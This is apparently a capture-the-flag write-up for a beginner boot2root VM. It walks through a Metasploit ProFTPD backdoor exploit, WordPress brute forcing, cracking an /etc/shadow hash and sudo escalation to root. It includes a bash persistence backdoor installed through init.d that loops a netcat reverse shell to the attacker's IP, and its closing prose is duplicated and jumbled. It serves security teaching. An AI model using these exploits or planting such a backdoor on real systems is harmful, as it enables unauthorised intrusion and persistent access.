



Info : This is a small boot2root VM I created for my university’s cyber security group. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. I did all of my testing for this VM on VirtualBox, so that’s the recommended platform. I have been informed that it also works with VMware, but I haven’t tested this personally.

This VM is specifically intended for newcomers to penetration testing. If you’re a beginner, you should hopefully find the difficulty of the VM to be just right.

First Way

Enumeration



┌─[✗]─[root@parrot]─[/home/user/VulnMachines]

└──╼ #nmap -sC -sV -A -oX basic_pentesting.xml 192.168.1.14

Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 22:29 +03

Nmap scan report for 192.168.1.14

Host is up (0.00039s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.3c

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)

| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)

|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel







msf exploit(unix/ftp/proftpd_133c_backdoor) > show options



Module options (exploit/unix/ftp/proftpd_133c_backdoor):



Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.1.15 yes The target address

RPORT 21 yes The target port (TCP)





Payload options (cmd/unix/reverse):



Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.1.11 yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port







meterpreter > sysinfo

Computer : 192.168.1.15

OS : Ubuntu 16.04 (Linux 4.10.0-28-generic)

Architecture : x64

BuildTuple : i486-linux-musl

Meterpreter : x86/linux

meterpreter > getuid

Server username: uid=0, gid=0, euid=0, egid=0

meterpreter > shell

Process 1333 created.

Channel 1 created.

pwd

/

whoami

root





Just For Fun



Coding Backdoor





#!/bin/bash



while [ 1 ]

do

nc.traditional 192.168.1.11 5555 -e /bin/bash

sleep 10

done









This is the traditional service management package for Linux, containing the init program (the first process that is run when the kernel has finished initializing¹) as well as some infrastructure to start and stop services and configure them [1].



So I uploaded the backdoor to victim's machine.







After that, I have to put this script in /etc/init.d directory.



mv /home/marlinspike/Downloads/backdoor.sh /etc/init.d

chmod +x /etc/init.d/backdoor.sh

update-rc.d /etc/init.d/backdoor.sh defaults



Mission is completed. After this, every opening of victim's machine this script will run and it will give us a chance connecting to victim's machine.







Second Way

In this part, I'll focus on port 80. Let's run nikto.



┌─[user@parrot]─[~/VulnMachines]

└──╼ $nikto -h 192.168.1.16

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 192.168.1.16

+ Target Hostname: 192.168.1.16

+ Target Port: 80

+ Start Time: 2019-02-18 23:26:29 (GMT3)

---------------------------------------------------------------------------

+ Server: Apache/2.4.18 (Ubuntu)

+ Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS

+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"

+ OSVDB-3092: /secret/: This might be interesting...

+ OSVDB-3233: /icons/README: Apache default file found.

+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host



+ OSVDB-3092: /secret/: This might be interesting...



When we get there, we see wordpress website. If you have a problem to see web page, you have to add [machine ip] and vtsec in /etc/hosts file. Let's run wpscan to enumerate.





─[✗]─[user@parrot]─[~/VulnMachines]

└──╼ $wpscan --url http://192.168.1.16/secret/ --enumerate --wp-content-dir wp-content dir



[i] User(s) Identified:



[+] admin

| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)



Website has got user enumeration vulnerability so I'll try to brute force on admin panel.



─[✗]─[user@parrot]─[~/VulnMachines]

└──╼ $wpscan --url http://192.168.1.16/secret/ -P /usr/share/wordlists/rockyou.txt --usernames admin --password-attack wp-login --wp-content-dir wp-content dir

[+] Performing password attack on Wp Login against 1 user/s

[SUCCESS] - admin / admin

Trying admin / admin Time: 00:04:15 <================================================================================================> (19820 / 19820) 100.00% Time: 00:04:15



[i] Valid Combinations Found:

| Username: admin, Password: admin





Password is found as an 'admin'. After that, I signed in and edited one of the pages in the website to get the reverse shell.



$ whoami

www-data

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)





I'm in the system as a user www-data. After some enumerations, I realized I can read content of the /etc/shadow file.



$ ls -l /etc/shadow

-rw-r--r-- 1 root shadow 1305 Nov 16 2017 /etc/shadow

marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::



I get the credentials of the marlinspike user and try to crack this hash using John The Ripper.



─[user@parrot]─[~/Downloads]

└──╼ $echo 'marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::' > marlinspike

┌─[user@parrot]─[~/Downloads]

└──╼ $john marlinspike

Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"

Use the "--format=crypt" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])

Press 'q' or Ctrl-C to abort, almost any other key for status

marlinspike (marlinspike)

1g 0:00:00:00 DONE 1/3 (2019-02-19 00:31) 20.00g/s 160.0p/s 160.0c/s 160.0C/s marlinspike..marlinspikemarlinspike

Use the "--show" option to display all of the cracked passwords reliably

Session completed

┌─[✗]─[user@parrot]─[~/Downloads]

└──╼ $john --show marlinspike

marlinspike:marlinspike:17484:0:99999:7:::



1 password hash cracked, 0 left



marlinspike:marlinspike



python -c 'import pty; pty.spawn("/bin/bash")'

www-data@vtcsec:/tmp$ su marlinspike

su marlinspike

Password: marlinspike

marlinspike@vtcsec:/tmp$





After I logged in as a marlinspike with these credentials that john's found. I tried to find a way to privilege escalation. After some time, I realized marlinspike user in sudo group. Now, privilege escalation part is become easy.



marlinspike@vtcsec:~$ sudo -l

sudo -l

[sudo] password for marlinspike: marlinspike



Matching Defaults entries for marlinspike on vtcsec:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin



User marlinspike may run the following commands on vtcsec:

(ALL : ALL) ALL

marlinspike@vtcsec:~$ sudo python3 -c "from os import system;system('/bin/bash')"

root@vtcsec:~# whoami

whoami

root



Note : If your changes in the /etc/hosts file doesn't affect anything, you can run this command,

$sudo service nscd restart

References [1] https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d













































So I uploaded the backdoor to victim's machine.After that, I have to put this script in /etc/init.d directory.Mission is completed. After this, every opening of victim's machine this script will run and it will give us a chance connecting to victim's machine.In this part, I'll focus on port 80. Let's run nikto.When we get there, we see wordpress website. If you have a problem to see web page, you have to add [machine ip] and vtsec in /etc/hosts file. Let's run wpscan to enumerate.Password is found as an 'admin'. After that, I signed in and edited one of the pages in the website to get the reverse shell.I get the credentials of the marlinspike user and try to crack this hash using John The Ripper.After I logged in as a marlinspike with these credentials that john's found. I tried to find a way to privilege escalation. After some time, I realized marlinspike user in sudo group. Now, privilege escalation part is become easy.: If your changes in the /etc/hosts file doesn't affect anything, you can run this command,[1] https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d

Link :I'll hack this machine using two different ways. This one is the first way.Nmap output,I'm going to focuspart. If you searchin mfsconsole, you can see exploits about that. I'll usewhich is giving the ability to run command on the system using proftpd's backdoor.As you can see above, I usedpayload which is giving me the reverse shell. Then I gained access the shell.We are already root!In this part, I'll try to put backdoor in the system so that I can access the machine for later.I want victim to connect to my machine every 10 second after victim's computer is opened. I'll code this backdoor using bash scripting. Here is the code,This piece of code do exactly what I said above. But how can victim's machine run this script every opening. The answer is. What is init.d ?